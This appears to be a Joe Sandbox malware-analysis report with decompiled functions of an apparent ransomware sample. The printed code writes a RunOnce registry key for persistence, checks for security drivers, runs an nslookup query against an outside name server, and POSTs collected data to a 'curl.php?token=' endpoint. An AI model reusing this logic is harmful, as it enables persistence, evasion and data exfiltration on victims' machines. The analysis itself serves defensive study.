					lstrcatW(_t96,  *(_t91 + 0x7c));
					lstrcatW(_t96, "&");
				}
				 *((short*)(_t96 + lstrlenW(_t96) * 2 - 2)) = 0;
				return _t96;
			}

0x004069a4
0x004069a7
0x004069b8
0x004069c1
0x004069c9
0x004069d2
0x004069da
0x004069da
0x004069df
0x004069e5
0x004069ed
0x004069f3
0x004069fb
0x004069fb
0x00406a01
0x00406a07
0x00406a0f
0x00406a15
0x00406a1d
0x00406a1d
0x00406a23
0x00406a29
0x00406a31
0x00406a37
0x00406a3f
0x00406a3f
0x00406a45
0x00406a4b
0x00406a53
0x00406a59
0x00406a61
0x00406a61
0x00406a67
0x00406a6d
0x00406a75
0x00406a7b
0x00406a83
0x00406a83
0x00406a89
0x00406a8f
0x00406a97
0x00406a9d
0x00406aa5
0x00406aa5
0x00406aab
0x00406ab1
0x00406ab9
0x00406abf
0x00406ac7
0x00406ac7
0x00406acd
0x00406ad3
0x00406adb
0x00406ae1
0x00406ae9
0x00406ae9
0x00406aef
0x00406afc
0x00406b02
0x00406b05
0x00406b0a
0x00406b27
0x00406b0c
0x00406b16
0x00406b1c
0x00406b34
0x00406b3c
0x00406b42
0x00406b4a
0x00406b56
0x00406b56
0x00406b60
0x00406b66
0x00406b6e
0x00406b74
0x00406b7c
0x00406b7c
0x00406b88
0x00406b92

APIs

lstrcatW.KERNEL32(?,?), ref: 004069C1
lstrcatW.KERNEL32(?,004103F0), ref: 004069C9
lstrcatW.KERNEL32(?,?), ref: 004069D2
lstrcatW.KERNEL32(?,004103F4), ref: 004069DA
lstrcatW.KERNEL32(?,?), ref: 004069E5
lstrcatW.KERNEL32(?,004103F0), ref: 004069ED
lstrcatW.KERNEL32(?,?), ref: 004069F3
lstrcatW.KERNEL32(?,004103F4), ref: 004069FB
lstrcatW.KERNEL32(?,?), ref: 00406A07
lstrcatW.KERNEL32(?,004103F0), ref: 00406A0F
lstrcatW.KERNEL32(?,?), ref: 00406A15
lstrcatW.KERNEL32(?,004103F4), ref: 00406A1D
lstrcatW.KERNEL32(?,?), ref: 00406A29
lstrcatW.KERNEL32(?,004103F0), ref: 00406A31
lstrcatW.KERNEL32(?,?), ref: 00406A37
lstrcatW.KERNEL32(?,004103F4), ref: 00406A3F
lstrcatW.KERNEL32(?,?), ref: 00406A4B
lstrcatW.KERNEL32(?,004103F0), ref: 00406A53
lstrcatW.KERNEL32(?,?), ref: 00406A59
lstrcatW.KERNEL32(?,004103F4), ref: 00406A61
lstrcatW.KERNEL32(?,?), ref: 00406A6D
lstrcatW.KERNEL32(?,004103F0), ref: 00406A75
lstrcatW.KERNEL32(?,004048B6), ref: 00406A7B
lstrcatW.KERNEL32(?,004103F4), ref: 00406A83
lstrcatW.KERNEL32(?,?), ref: 00406A8F
lstrcatW.KERNEL32(?,004103F0), ref: 00406A97
lstrcatW.KERNEL32(?,?), ref: 00406A9D
lstrcatW.KERNEL32(?,004103F4), ref: 00406AA5
lstrcatW.KERNEL32(?,?), ref: 00406AB1
lstrcatW.KERNEL32(?,004103F0), ref: 00406AB9
lstrcatW.KERNEL32(?,?), ref: 00406ABF
lstrcatW.KERNEL32(?,004103F4), ref: 00406AC7
lstrcatW.KERNEL32(?,?), ref: 00406AD3
lstrcatW.KERNEL32(?,004103F0), ref: 00406ADB
lstrcatW.KERNEL32(?,?), ref: 00406AE1
lstrcatW.KERNEL32(?,004103F4), ref: 00406AE9
VirtualAlloc.KERNEL32(00000000,00000042,00003000,00000040,00000000,00000000,?,?,004045E9,00000000,?,00003000,00000040,00000000,?,00000000), ref: 00406AFC
wsprintfW.USER32 ref: 00406B16
wsprintfW.USER32 ref: 00406B27
lstrcatW.KERNEL32(?,?), ref: 00406B34
lstrcatW.KERNEL32(?,004103F0), ref: 00406B3C
lstrcatW.KERNEL32(?,?), ref: 00406B42
lstrcatW.KERNEL32(?,004103F4), ref: 00406B4A
VirtualFree.KERNELBASE(?,00000000,00008000,?,00000000,00000000,?,00000000), ref: 00406B56
lstrcatW.KERNEL32(?,?), ref: 00406B66
lstrcatW.KERNEL32(?,004103F0), ref: 00406B6E
lstrcatW.KERNEL32(?,?), ref: 00406B74
lstrcatW.KERNEL32(?,004103F4), ref: 00406B7C
lstrlenW.KERNEL32(?,00000000,00000000,?,?,004045E9,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00406B7F

Strings

undefined, xrefs: 00406B21
%x%x, xrefs: 00406B10

Memory Dump Source

Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd

Yara matches

Similarity

API ID: lstrcat$Virtualwsprintf$AllocFreelstrlen
String ID: %x%x$undefined
API String ID: 3872469520-3801831566
Opcode ID: b4ce8e6092dab11b5570eb4b7fe377be8a76f675d54b5694e6accb4a7b5be685
Instruction ID: 157d45b09fe4d6cbf2a129cbf998294f04408a9e253f235917979037099c56e6
Opcode Fuzzy Hash: b4ce8e6092dab11b5570eb4b7fe377be8a76f675d54b5694e6accb4a7b5be685
Instruction Fuzzy Hash: 80511B31281669B7CB273B658C49FDF3A19EF86700F124061F91028096CFBD9592DEAE

Uniqueness

Uniqueness Score: -1.00%

Function 00402960 Relevance: 63.1, APIs: 5, Strings: 31, Instructions: 87
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E00402960(char* __ecx, void* __eflags) {
				void* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v32;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				short _v140;
				long _t45;
				int _t47;
				char* _t58;

				_t58 = __ecx;
				_v32 = 0x520050;
				_v28 = 0x440049;
				_push(0x41);
				_v24 = 0x520055;
				_v20 = 0x530041;
				_v16 = 0x4b0048;
				_v12 = 0x41;
				E00407C60( &_v32, lstrlenW( &_v32)); // executed
				_v140 = 0x4f0053;
				_t10 =  &_v8; // 0x402c45
				_v136 = 0x540046;
				_v132 = 0x410057;
				_v128 = 0x450052;
				_v124 = 0x4d005c;
				_v120 = 0x630069;
				_v116 = 0x6f0072;
				_v112 = 0x6f0073;
				_v108 = 0x740066;
				_v104 = 0x57005c;
				_v100 = 0x6e0069;
				_v96 = 0x6f0064;
				_v92 = 0x730077;
				_v88 = 0x43005c;
				_v84 = 0x720075;
				_v80 = 0x650072;
				_v76 = 0x74006e;
				_v72 = 0x650056;
				_v68 = 0x730072;
				_v64 = 0x6f0069;
				_v60 = 0x5c006e;
				_v56 = 0x750052;
				_v52 = 0x4f006e;
				_v48 = 0x63006e;
				_v44 = 0x65;
				_t45 = RegCreateKeyExW(0x80000001,  &_v140, 0, 0, 0, 0xf003f, 0, _t10, 0); // executed
				if(_t45 != 0) {
					return 0;
				} else {
					_t47 = lstrlenW(_t58);
					_t37 =  &_v8; // 0x402c45, executed
					RegSetValueExW( *_t37,  &_v32, 0, 1, _t58, _t47 + _t47); // executed
					asm("sbb esi, esi"); // executed
					RegCloseKey(_v8);
					_t39 =  &(_t58[1]); // 0x1
					return _t39;
				}
			}

0x0040296b
0x0040296d
0x00402979
0x00402980
0x00402984
0x0040298c
0x00402993
0x0040299a
0x004029a8
0x004029b0
0x004029ba
0x004029bd
0x004029c7
0x004029ce
0x004029eb
0x004029f8
0x004029ff
0x00402a06
0x00402a0d
0x00402a14
0x00402a1b
0x00402a22
0x00402a29
0x00402a30
0x00402a37
0x00402a3e
0x00402a45
0x00402a4c
0x00402a53
0x00402a5a
0x00402a61
0x00402a68
0x00402a6f
0x00402a76
0x00402a7d
0x00402a84
0x00402a8c
0x00402ac7
0x00402a8e
0x00402a8f
0x00402aa1
0x00402aa4
0x00402aaf
0x00402ab1
0x00402ab7
0x00402abf
0x00402abf

APIs

lstrlenW.KERNEL32(00520050,00000041,74CF82B0,00000000), ref: 0040299D

Part of subcall function 00407C60: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 00407C7D
Part of subcall function 00407C60: VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 00407CAB
Part of subcall function 00407C60: GetModuleHandleA.KERNEL32(?), ref: 00407CFF
Part of subcall function 00407C60: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 00407D0D
Part of subcall function 00407C60: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 00407D1C
Part of subcall function 00407C60: CryptReleaseContext.ADVAPI32(?,00000000), ref: 00407D65
Part of subcall function 00407C60: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00407D73

RegCreateKeyExW.KERNEL32(80000001,004F0053,00000000,00000000,00000000,000F003F,00000000,E,@,00000000), ref: 00402A84
lstrlenW.KERNEL32(00000000), ref: 00402A8F
RegSetValueExW.KERNEL32(E,@,00520050,00000000,00000001,00000000,00000000), ref: 00402AA4
RegCloseKey.KERNEL32(?), ref: 00402AB1

Strings

i, xrefs: 00402A5A
s, xrefs: 00402A06
\, xrefs: 004029EB
n, xrefs: 00402A6F
r, xrefs: 004029FF
n, xrefs: 00402A76
E,@, xrefs: 004029BA, 00402AA1, 004029D7
n, xrefs: 00402A61
W, xrefs: 004029C7
\, xrefs: 00402A30
A, xrefs: 0040298C
w, xrefs: 00402A29
H, xrefs: 00402993
i, xrefs: 00402A1B
I, xrefs: 00402979
F, xrefs: 004029BD
i, xrefs: 004029F8
S, xrefs: 004029B0
r, xrefs: 00402A53
r, xrefs: 00402A3E
R, xrefs: 00402A68
P, xrefs: 0040296D
R, xrefs: 004029CE
f, xrefs: 00402A0D
V, xrefs: 00402A4C
e, xrefs: 00402A7D
d, xrefs: 00402A22
U, xrefs: 00402984
\, xrefs: 00402A14
u, xrefs: 00402A37
n, xrefs: 00402A45

Memory Dump Source

Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd

Yara matches

Similarity

API ID: ContextCryptVirtuallstrlen$AcquireAddressAllocCloseCreateFreeHandleLibraryLoadModuleProcReleaseValue
String ID: A$E,@$F$H$I$P$R$R$S$U$V$W$\$\$\$d$e$f$i$i$i$n$n$n$n$r$r$r$s$u$w
API String ID: 553367697-1908525871
Opcode ID: bc2aa759d9655fff48c3731314f56cd013a72bf6e49cbd10b87566378500ce0d
Instruction ID: 6d84f0b14520ef3984e43a4999751383e09c14a2564039d175e156e7e031e40b
Opcode Fuzzy Hash: bc2aa759d9655fff48c3731314f56cd013a72bf6e49cbd10b87566378500ce0d
Instruction Fuzzy Hash: A431DBB090021CDFEB20CF91E949BEDBFB5FB01709F108119D5187A292D7BA4948CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00402D30 Relevance: 54.4, APIs: 19, Strings: 12, Instructions: 137
windowthreadregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E00402D30() {
				struct _WNDCLASSEXW _v52;
				struct tagMSG _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				void* _t37;
				short _t42;
				void* _t49;
				void* _t59;
				void* _t60;
				void* _t61;
				void* _t62;
				void* _t67;
				void* _t69;
				long _t71;

				_push(_t62);
				_push(_t69);
				_v84.message = 0x6c006b;
				_push(_t67);
				_v84.wParam = 0x660069;
				_v84.lParam = 0x73002e;
				_v84.time = 0x730079;
				_v84.pt = 0;
				_v96 = 0x6c006b;
				_v92 = 0x2e0031;
				_v88 = 0x790073;
				_v84.hwnd = 0x73;
				_t37 = E00402F50( &(_v84.message)); // executed
				if(_t37 != 0) {
					L5:
					_v52.cbSize = 0x30;
					_v52.style = 3;
					_v52.lpfnWndProc = E00402C50;
					_v52.cbClsExtra = 0;
					_v52.cbWndExtra = 0;
					_v52.hInstance = GetModuleHandleW(0);
					_v52.hIcon = 0;
					_v52.hCursor = LoadCursorW(0, 0x7f00);
					_v52.hbrBackground = 6;
					_v52.lpszMenuName = 0;
					_v52.lpszClassName = L"win32app";
					_v52.hIconSm = LoadIconW(_v52.hInstance, 0x7f00);
					_t42 = RegisterClassExW( &_v52);
					_push(0);
					if(_t42 != 0) {
						GetModuleHandleW();
						_t71 = CreateWindowExW(0, L"win32app", L"firefox", 0xcf0000, 0x80000000, 0x80000000, 5, 5, 0, 0, GetModuleHandleW(0), 0);
						SetWindowLongW(_t71, 0xfffffff0, 0);
						if(_t71 != 0) {
							ShowWindow(_t71, 5);
							UpdateWindow(_t71);
							_t49 = CreateThread(0, 0, E00402D10, _t71, 0, 0);
							if(_t49 != 0) {
								CloseHandle(_t49);
							}
							if(GetMessageW( &_v84, 0, 0, 0) == 0) {
								L15:
								ExitThread(0);
							} else {
								do {
									TranslateMessage( &_v84);
								} while (DispatchMessageW( &_v84) != 0xdeadbeef && GetMessageW( &_v84, 0, 0, 0) != 0);
								goto L15;
							}
						}
						ExitThread(_t71);
					}
					ExitThread();
				}
				_t59 = E00402F50( &_v96); // executed
				if(_t59 != 0) {
					goto L5;
				}
				_v84.message = 0x730066;
				_v84.wParam = 0x660064;
				_v84.lParam = 0x2e0077;
				_v84.time = 0x790073;
				_v84.pt = 0x73;
				_t60 = E00402F50( &(_v84.message)); // executed
				if(_t60 != 0) {
					goto L15;
				}
				_t61 = E004030A0(_t62, _t67, _t69); // executed
				if(_t61 != 0) {
					goto L15;
				}
				_push(_t61); // executed
				E00402AD0(); // executed
				goto L5;
			}

0x00402d39
0x00402d3a
0x00402d3d
0x00402d45
0x00402d4a
0x00402d52
0x00402d5a
0x00402d62
0x00402d67
0x00402d6f
0x00402d77
0x00402d7f
0x00402d87
0x00402d8e
0x00402de9
0x00402df1
0x00402df9
0x00402e01
0x00402e09
0x00402e11
0x00402e22
0x00402e26
0x00402e3d
0x00402e41
0x00402e49
0x00402e51
0x00402e5f
0x00402e68
0x00402e6e
0x00402e73
0x00402e7b
0x00402eaf
0x00402eb4
0x00402ebc
0x00402ec8
0x00402ecf
0x00402ee3
0x00402eeb
0x00402eee
0x00402eee
0x00402f09
0x00402f3d
0x00402f3f
0x00402f0b
0x00402f17
0x00402f1c
0x00402f25
0x00000000
0x00402f17
0x00402f09
0x00402ebf
0x00402ebf
0x00402e75
0x00402e75
0x00402d94
0x00402d9b
0x00000000
0x00000000
0x00402da1
0x00402da9
0x00402db1
0x00402db9
0x00402dc1
0x00402dc9
0x00402dd0
0x00000000
0x00000000
0x00402dd6
0x00402ddd
0x00000000
0x00000000
0x00402de3
0x00402de4
0x00000000

APIs

Part of subcall function 00402F50: K32EnumDeviceDrivers.KERNEL32(?,00000004,?), ref: 00402F74

GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 00402E19
LoadCursorW.USER32(00000000,00007F00), ref: 00402E2E
LoadIconW.USER32 ref: 00402E59
RegisterClassExW.USER32 ref: 00402E68
ExitThread.KERNEL32 ref: 00402E75

Part of subcall function 00402F50: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00402F8D

GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,00007F00), ref: 00402E7B
GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00007F00), ref: 00402E81
CreateWindowExW.USER32 ref: 00402EA7
SetWindowLongW.USER32 ref: 00402EB4
ExitThread.KERNEL32 ref: 00402EBF

Part of subcall function 00402F50: K32EnumDeviceDrivers.KERNEL32(00000000,00000000,?), ref: 00402FA8
Part of subcall function 00402F50: K32GetDeviceDriverBaseNameW.KERNEL32(00000000,?,00000400), ref: 00402FCF
Part of subcall function 00402F50: lstrcmpiW.KERNEL32(?,006C006B), ref: 00402FE3
Part of subcall function 00402F50: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00402FFA

ExitThread.KERNEL32 ref: 00402F3F

Part of subcall function 00402AD0: VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000040), ref: 00402AEA
Part of subcall function 00402AD0: GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 00402B2C
Part of subcall function 00402AD0: GetTempPathW.KERNEL32(00000100,00000000), ref: 00402B38
Part of subcall function 00402AD0: ExitThread.KERNEL32 ref: 00402C47

ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,00007F00), ref: 00402EC8
UpdateWindow.USER32(00000000), ref: 00402ECF
CreateThread.KERNEL32 ref: 00402EE3
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00007F00), ref: 00402EEE
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00402F05
TranslateMessage.USER32(?), ref: 00402F1C
DispatchMessageW.USER32 ref: 00402F23
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00402F37

Strings

s, xrefs: 00402D7F
s, xrefs: 00402D77
0, xrefs: 00402DF1
s, xrefs: 00402DC1
k, xrefs: 00402D67
1, xrefs: 00402D6F
s, xrefs: 00402DB9
win32app, xrefs: 00402E51, 00402EA0
f, xrefs: 00402DA1
w, xrefs: 00402DB1
firefox, xrefs: 00402E9B
d, xrefs: 00402DA9

Memory Dump Source

Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd

Yara matches

Similarity

API ID: Thread$ExitHandleMessageModuleWindow$DeviceVirtual$AllocCreateDriversEnumLoadName$BaseClassCloseCursorDispatchDriverFileFreeIconLongPathRegisterShowTempTranslateUpdatelstrcmpi
String ID: 0$1$d$f$firefox$k$s$s$s$s$w$win32app
API String ID: 3011903443-520298170
Opcode ID: 4a679d84ba6cb8d8a57319f91f88c6eb5e3a57dc7d18787ade47d617a941c88f
Instruction ID: 6dadb659047271fd80ce1d130f626f3db599e38ffd86fa9de69c1f1ec4dcf306
Opcode Fuzzy Hash: 4a679d84ba6cb8d8a57319f91f88c6eb5e3a57dc7d18787ade47d617a941c88f
Instruction Fuzzy Hash: 0F515070248302AFF7109F618D0DB5B7AE4AF44748F10092DF684BA2D1D7F99945CB9E

Uniqueness

Uniqueness Score: -1.00%

Function 00404D60 Relevance: 40.4, APIs: 8, Strings: 15, Instructions: 101
pipememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00404D60(CHAR* __ecx, void* __edx) {
				struct _SECURITY_ATTRIBUTES _v16;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				short _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t28;
				void* _t37;
				CHAR* _t43;
				void* _t45;

				_v76 = 0x73006e;
				_v20 = 0;
				_t37 = __edx;
				_v16.lpSecurityDescriptor = 0;
				_t43 = __ecx;
				_v72 = 0x6f006c;
				_v68 = 0x6b006f;
				_v64 = 0x700075;
				_v60 = 0x250020;
				_v56 = 0x200053;
				_v52 = 0x6e0064;
				_v48 = 0x310073;
				_v44 = 0x73002e;
				_v40 = 0x70006f;
				_v36 = 0x6f0072;
				_v32 = 0x6e0064;
				_v28 = 0x2e0073;
				_v24 = 0x750072;
				_v16.nLength = 0xc;
				_v16.bInheritHandle = 1;
				_t24 = CreatePipe(0x412b10, 0x412b0c,  &_v16, 0); // executed
				if(_t24 != 0) {
					_t24 = SetHandleInformation( *0x412b10, 1, 0);
					if(_t24 == 0) {
						goto L1;
					} else {
						CreatePipe(0x412b08, 0x412b14,  &_v16, 0); // executed
						_t24 = SetHandleInformation( *0x412b14, 1, 0);
						if(_t24 == 0) {
							goto L1;
						} else {
							_t28 = VirtualAlloc(0, 0x2800, 0x3000, 4); // executed
							_t45 = _t28;
							if(_t45 == 0) {
								lstrcpyA(_t43, "fabian wosar <3");
								return 0;
							} else {
								wsprintfW(_t45,  &_v76, _t37);
								E00404B10(_t45); // executed
								E00404CB0(_t37, _t43, _t37, _t43, _t45); // executed
								VirtualFree(_t45, 0, 0x8000); // executed
								return 0;
							}
						}
					}
				} else {
					L1:
					return _t24 | 0xffffffff;
				}
			}

0x00404d6b
0x00404d73
0x00404d77
0x00404d79
0x00404d7c
0x00404d81
0x00404d93
0x00404d9a
0x00404da1
0x00404da8
0x00404daf
0x00404db6
0x00404dbd
0x00404dc4
0x00404dcb
0x00404dd2
0x00404dd9
0x00404de0
0x00404de7
0x00404dee
0x00404df5
0x00404dfd
0x00404e19
0x00404e1d
0x00000000
0x00404e1f
0x00404e2f
0x00404e3f
0x00404e43
0x00000000
0x00404e45
0x00404e53
0x00404e59
0x00404e5d
0x00404e9b
0x00404ea9
0x00404e5f
0x00404e65
0x00404e70
0x00404e79
0x00404e86
0x00404e94
0x00404e94
0x00404e5d
0x00404e43
0x00404dff
0x00404dff
0x00404e08
0x00404e08

APIs

CreatePipe.KERNEL32(00412B10,00412B0C,?,00000000,00000000,00000001,00000000), ref: 00404DF5
SetHandleInformation.KERNEL32(00000001,00000000), ref: 00404E19
CreatePipe.KERNEL32(00412B08,00412B14,0000000C,00000000), ref: 00404E2F
SetHandleInformation.KERNEL32(00000001,00000000), ref: 00404E3F
VirtualAlloc.KERNEL32(00000000,00002800,00003000,00000004), ref: 00404E53
wsprintfW.USER32 ref: 00404E65
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00404E86

Strings

u, xrefs: 00404D9A
s, xrefs: 00404DB6
S, xrefs: 00404DA8
r, xrefs: 00404DE0
l, xrefs: 00404D81
., xrefs: 00404DBD
fabian wosar <3, xrefs: 00404E95
o, xrefs: 00404D93
o, xrefs: 00404DC4
s, xrefs: 00404DD9
r, xrefs: 00404DCB
n, xrefs: 00404D6B
d, xrefs: 00404DD2
, xrefs: 00404DA1
d, xrefs: 00404DAF

Memory Dump Source

Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd

Yara matches

Similarity

API ID: CreateHandleInformationPipeVirtual$AllocFreewsprintf
String ID: $.$S$d$d$fabian wosar <3$l$n$o$o$r$r$s$s$u
API String ID: 1490407255-783179298
Opcode ID: 5b63822ef074579cd001efa140b9789c7fd5fb445f6afd0b1fdc3c768e3f9d6f
Instruction ID: 87b3df06f302a376c278e654a4a7d1f30e625f23b6bcd530246e45e208265c66
Opcode Fuzzy Hash: 5b63822ef074579cd001efa140b9789c7fd5fb445f6afd0b1fdc3c768e3f9d6f
Instruction Fuzzy Hash: FB31D8B1B01308ABEB109F95AD49BEE7FB5FB44714F104036E604F62D1D7F559448BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00405370 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 136
stringmemorynetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 35%

			E00405370(CHAR* __ecx, CHAR** __edx, intOrPtr _a4) {
				CHAR* _v12;
				void* _v16;
				CHAR** _v20;
				void* _v24;
				void* _v28;
				void* _v32;
				char _v36;
				short _v136;
				char _v1156;
				short _v1160;
				void* _t31;
				int _t45;
				void* _t53;
				CHAR* _t57;
				CHAR* _t59;
				CHAR* _t60;
				void* _t61;
				void* _t70;
				short _t71;

				_t59 = __ecx;
				_v20 = __edx;
				_v12 = __ecx;
				E004077F0( &_v36); // executed
				_t31 = E00404EB0(); // executed
				_v24 = _t31;
				_t70 = 0x400 + lstrlenA(_t59) * 2;
				_t7 = _t70 + 1; // 0x74cb6981
				_t60 = VirtualAlloc(0, _t7, 0x3000, 0x40);
				_v28 = _t60;
				_v16 = VirtualAlloc(0, 0x32001, 0x3000, 0x40);
				if(_t60 == 0) {
					L2:
					_t60 = 0;
					L3:
					lstrcatA(_t60, "data=");
					lstrcatA(_t60, _v12);
					asm("movdqu xmm0, [0x40ffd0]");
					asm("movdqu [ebp-0x84], xmm0");
					asm("movdqu xmm0, [0x40ffe0]");
					asm("movdqu [ebp-0x74], xmm0");
					asm("movdqu xmm0, [0x40fff0]");
					asm("movdqu [ebp-0x64], xmm0");
					asm("movdqu xmm0, [0x410000]");
					asm("movdqu [ebp-0x54], xmm0");
					asm("movdqu xmm0, [0x410010]");
					asm("movdqu [ebp-0x44], xmm0");
					asm("movdqu xmm0, [0x410020]");
					asm("movdqu [ebp-0x34], xmm0");
					lstrlenA(_t60);
					_t71 = 0;
					_v1160 = 0;
					E00408B30( &_v1156, 0, 0x3fc);
					lstrcpyW( &_v1160, L"curl.php?token=");
					E00405270( &_v1160);
					_t45 = lstrlenW( &_v136);
					_t74 = _v16;
					_push(_t45);
					_push( &_v136);
					_push(L"POST");
					_push(0x31fff);
					_push(_v16);
					_push(lstrlenA(_t60));
					_push(_t60);
					_t61 = _v24;
					_push( &_v1160);
					_push(_t61);
					if(E00407A00( &_v36) != 0) {
						_t71 = 1;
						if(_a4 != 0) {
							_v12 = 0;
							if(E00405050(_t74,  &_v12) == 0) {
								_t71 = 0;
							} else {
								_t57 = _v12;
								if(_t57 != 0) {
									 *_v20 = _t57;
								}
							}
						}
					}
					VirtualFree(_t61, 0, 0x8000);
					VirtualFree(_v16, 0, 0x8000);
					VirtualFree(_v28, 0, 0x8000);
					_t53 = _v32;
					if(_t53 != 0) {
						InternetCloseHandle(_t53);
					}
					return _t71;
				}
				_t10 = _t70 + 1; // 0x74cb6981
				if(_t70 < _t10) {
					goto L3;
				}
				goto L2;
			}

0x0040537b
0x0040537d
0x00405384
0x00405387
0x0040538c
0x00405392
0x004053a8
0x004053af
0x004053c3
0x004053c7
0x004053cc
0x004053d1
0x004053da
0x004053da
0x004053dc
0x004053e8
0x004053ee
0x004053f0
0x004053f9
0x00405401
0x00405409
0x0040540e
0x00405416
0x0040541b
0x00405423
0x00405428
0x00405430
0x00405435
0x0040543d
0x00405442
0x00405448
0x00405457
0x0040545d
0x00405471
0x0040547d
0x00405489
0x0040548f
0x00405492
0x00405499
0x0040549a
0x004054a2
0x004054a7
0x004054af
0x004054b0
0x004054b1
0x004054ba
0x004054bb
0x004054c6
0x004054cc
0x004054d1
0x004054d6
0x004054e6
0x004054f6
0x004054e8
0x004054e8
0x004054ed
0x004054f2
0x004054f2
0x004054ed
0x004054e6
0x004054d1
0x00405506
0x00405512
0x0040551e
0x00405520
0x00405525
0x00405528
0x00405528
0x00405536
0x00405536
0x004053d3
0x004053d8
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 004077F0: InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004079D4
Part of subcall function 004077F0: InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 004079ED

Part of subcall function 00404EB0: VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,74CB6980,00000000,00000000), ref: 00404F22
Part of subcall function 00404EB0: Sleep.KERNEL32(00002710), ref: 00404F4C
Part of subcall function 00404EB0: lstrlenW.KERNEL32(00000000,00003000,00000004), ref: 00404F5A
Part of subcall function 00404EB0: VirtualAlloc.KERNEL32(00000000,00000000), ref: 00404F6A
Part of subcall function 00404EB0: lstrcmpiA.KERNEL32(00000000,fabian wosar <3), ref: 00404F7E
Part of subcall function 00404EB0: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00404F8F
